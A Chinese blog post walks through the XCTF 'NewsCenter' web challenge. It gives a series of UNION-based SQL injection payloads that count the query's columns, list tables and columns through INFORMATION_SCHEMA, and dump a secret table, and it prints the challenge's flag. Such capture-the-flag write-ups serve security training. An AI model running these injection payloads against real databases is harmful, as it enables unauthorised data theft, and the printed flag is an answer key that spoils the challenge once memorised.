【愚公系列】2021年12月 攻防世界-进阶题-WEB-007(NewsCenter)
【愚公系列】2021年12月 攻防世界-进阶题-WEB-007(NewsCenter)
愚公搬代码
发布于 2021-12-27 08:13:19
发布于 2021-12-27 08:13:19
文章被收录于专栏:历史专栏
文章目录
一、NewsCenter
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1
二、使用步骤
1.点击获取在线场景
在这里插入图片描述
2.手工注入
在这里插入图片描述
首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据
在这里插入图片描述
然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容
在这里插入图片描述
再用 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 得到 secret_table 表的列名以及数据类型
在这里插入图片描述
最后就可以简单粗暴地得到flag
' and 0 union select 1,2,fl4g from secret_table #
在这里插入图片描述
得到flag:QCTF{sq1_inJec7ion_ezzz}
总结
- 手工注入
- sqlmap
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021/12/26 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
